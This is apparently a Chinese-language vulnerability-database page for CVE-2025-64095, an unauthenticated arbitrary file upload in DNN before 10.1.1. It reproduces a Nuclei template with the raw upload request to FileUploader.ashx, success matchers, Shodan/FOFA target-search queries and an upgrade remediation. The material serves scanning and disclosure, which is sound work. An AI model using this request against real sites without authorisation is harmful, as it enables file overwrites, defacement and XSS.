CVE-2025-64095: DNN - Unrestricted Arbitrary File Upload

日期: 2025-11-07 | 影响软件: DNN | POC: 已公开

漏洞描述

DNN (formerly DotNetNuke) \u003C 10.1.1 contains an unrestricted file upload vulnerability caused by the default HTML editor provider allowing unauthenticated file uploads and overwriting existing files, letting unauthenticated attackers deface websites and inject XSS payloads, exploit requires no authentication.

PoC代码[已公开]

id: CVE-2025-64095

info:
  name: DNN - Unrestricted Arbitrary File Upload
  author: DhiyaneshDk,pussycat0x
  severity: critical
  description: |
    DNN (formerly DotNetNuke) \u003C 10.1.1 contains an unrestricted file upload vulnerability caused by the default HTML editor provider allowing unauthenticated file uploads and overwriting existing files, letting unauthenticated attackers deface websites and inject XSS payloads, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can upload and overwrite files, leading to website defacement and cross-site scripting attacks.
  remediation: |
    Update to version 10.1.1 or later.
  reference:
    - https://github.com/h4x0r-dz/CVE-2025-64095---DNN-Unauthenticated-arbitrary-file-upload
  metadata:
    verified: true
    max-request: 1
    vendor: dnnsoftware
    product: dotnetnuke
    shodan-query:
      - "Set-Cookie: dnn_IsMobile"
      - http.favicon.hash:-1465479343
    fofa-query:
      - app="dotnetnuke"
      - "Set-Cookie: dnn_IsMobile"
      - icon_hash="-1465479343"
  tags: cve,cve2025,intrusive,file-upload,dnn

variables:
  filename: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST /Providers/HtmlEditorProviders/DNNConnect.CKE/Browser/FileUploader.ashx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=------------------------7RKjWLYyrhvUn2AA31fJQ3

        --------------------------7RKjWLYyrhvUn2AA31fJQ3
        Content-Disposition: form-data; name="file"; filename="{{filename}}.png"
        Content-Type: image/png

        {{randstr}}
        --------------------------7RKjWLYyrhvUn2AA31fJQ3
        Content-Disposition: form-data; name="storageFolderID"

        1
        --------------------------7RKjWLYyrhvUn2AA31fJQ3
        Content-Disposition: form-data; name="portalID"

        0
        --------------------------7RKjWLYyrhvUn2AA31fJQ3
        Content-Disposition: form-data; name="overrideFiles"

        1
        --------------------------7RKjWLYyrhvUn2AA31fJQ3
        Content-Disposition: form-data; name="mode"

        Default
        --------------------------7RKjWLYyrhvUn2AA31fJQ3--

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"group"'
          - 'delete_type'
        condition: and

      - type: word
        part: content_type
        words:
          - "text/plain"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100f26d1612a3a410c7f8a90974cda542d98c483dc7cd370266c59cba757fc547bd0220740f5f0e1ecb29684c80d0b661562ad641264bc3178375016e306c6679ed730c:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-64095.yaml

相关漏洞推荐